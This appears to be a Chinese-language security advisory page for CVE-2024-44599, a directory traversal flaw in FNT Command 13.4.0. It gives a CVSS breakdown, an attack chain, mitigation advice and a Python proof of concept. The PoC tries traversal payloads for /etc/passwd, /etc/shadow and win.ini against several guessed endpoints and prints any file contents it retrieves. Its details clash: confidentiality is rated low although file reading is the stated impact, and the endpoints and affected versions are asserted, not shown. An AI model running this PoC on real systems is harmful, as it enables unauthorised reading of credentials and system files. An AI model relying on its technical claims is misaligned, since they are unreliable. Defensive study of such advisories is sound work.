CVE-2024-44599 | FNT Command 目录遍历漏洞

漏洞信息

漏洞编号

CVE-2024-44599

漏洞类型

目录遍历

CVSS评分

8.3 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

FNT Command

漏洞概述

CVE-2024-44599是FNT Command 13.4.0版本中存在的一个高危目录遍历（Directory Traversal）漏洞。该漏洞的CVSS评分为8.3，属于高危级别。攻击者可以通过构造特殊的HTTP请求，利用路径遍历字符（如../）来访问服务器上的任意文件，包括敏感配置文件、系统文件和其他不应被公开访问的资源。FNT Command是一款用于文件管理和传输的应用程序，通常在企业环境中用于管理文件和目录。该漏洞的存在可能导致敏感信息泄露，包括配置凭证、数据库连接信息、甚至可能导致进一步的攻击，如远程代码执行。漏洞的认证要求为低权限，意味着即使是没有特殊权限的普通用户也可能利用此漏洞发起攻击。该漏洞通过网络远程利用，无需用户交互，机密性影响为低，完整性影响为高，可用性影响为高。建议受影响的用户尽快升级到最新版本或采取相应的防护措施。

技术细节

目录遍历漏洞，又称路径穿越漏洞，发生在应用程序对用户输入的文件路径处理不当的情况下。在FNT Command 13.4.0中，攻击者可以通过在HTTP请求中注入特殊的路径遍历序列（如../或..\）来绕过应用程序的路径限制，访问服务器上的敏感文件。漏洞主要源于应用程序未能正确验证和过滤用户提供的文件路径参数。攻击者可能利用此漏洞读取配置文件（如config.xml、web.config）、系统文件（如/etc/passwd）、应用程序源代码、数据库凭证等敏感信息。在某些情况下，如果应用程序具有文件写入功能，攻击者还可能利用目录遍历漏洞实现远程代码执行。CVSS向量显示该漏洞的网络攻击向量（AV:N）表明攻击者可以从远程网络发起攻击，低权限要求（PR:L）意味着普通用户即可利用此漏洞，这大大增加了漏洞的利用风险。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标系统运行FNT Command 13.4.0版本，通过端口扫描和横幅识别确定目标

STEP 2

步骤2

漏洞探测：攻击者尝试访问常见的目录遍历敏感端点，如download、file、view等参数

STEP 3

步骤3

构造Payload：使用路径遍历序列（../或URL编码的..%2F）构造恶意请求，尝试访问系统文件

STEP 4

步骤4

敏感文件读取：成功利用漏洞后，读取/etc/passwd、配置文件、数据库凭证等敏感信息

STEP 5

步骤5

权限提升或远程代码执行：利用获取的凭证信息进行横向移动或进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import urllib.parse

# CVE-2024-44599 Directory Traversal PoC
# Target: FNT Command 13.4.0

target_url = "http://target.com/fnt-command"

# Path traversal payloads to read sensitive files
payloads = [
    "../../../../../../etc/passwd",
    "../../../../../../windows/win.ini",
    "../../../../../../../../etc/shadow",
    "..\..\..\..\..\windows\system32\drivers\etc\hosts"
]

def test_directory_traversal():
    print(f"[*] Testing CVE-2024-44599 on {target_url}")
    
    for payload in payloads:
        # Try different path traversal patterns
        encoded_payload = urllib.parse.quote(payload, safe='')
        
        # Common vulnerable endpoints
        endpoints = [
            f"{target_url}/download?file={payload}",
            f"{target_url}/file?path={payload}",
            f"{target_url}/view?file={encoded_payload}",
            f"{target_url}/api/download?filename={payload}"
        ]
        
        for endpoint in endpoints:
            try:
                response = requests.get(endpoint, timeout=10)
                if response.status_code == 200:
                    if 'root:' in response.text or '[extensions]' in response.text:
                        print(f"[+] VULNERABLE! {endpoint}")
                        print(f"[+] Content preview:\n{response.text[:500]}")
                        return True
            except requests.exceptions.RequestException as e:
                print(f"[-] Error testing {endpoint}: {e}")
    
    print("[-] No obvious vulnerability found (manual testing recommended)")
    return False

if __name__ == "__main__":
    test_directory_traversal()

影响范围

FNT Command < 13.4.0

FNT Command 13.4.0 (confirmed vulnerable)

防御指南

临时缓解措施

在官方补丁发布之前，可以采取以下临时缓解措施：1）使用Web应用防火墙规则拦截包含../、..\、%2e%2e等路径遍历特征的请求；2）限制应用程序的文件系统访问权限，配置chroot环境；3）禁用不必要的文件访问功能；4）实施严格的访问控制策略，限制低权限用户对敏感功能的访问；5）加强对日志的监控，及时发现异常的文件访问行为；6）考虑使用虚拟补丁技术，在应用层拦截针对该漏洞的攻击尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2024-44599
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2024-44599
3 Details https://www.cvedetails.com/cve/CVE-2024-44599/
4 VulDB https://vuldb.com/cve/CVE-2024-44599
5 Link http://fnt.com
6 Link https://gist.github.com/ZeroBreach-GmbH/577755034cb5c0423fbb0bba659b915d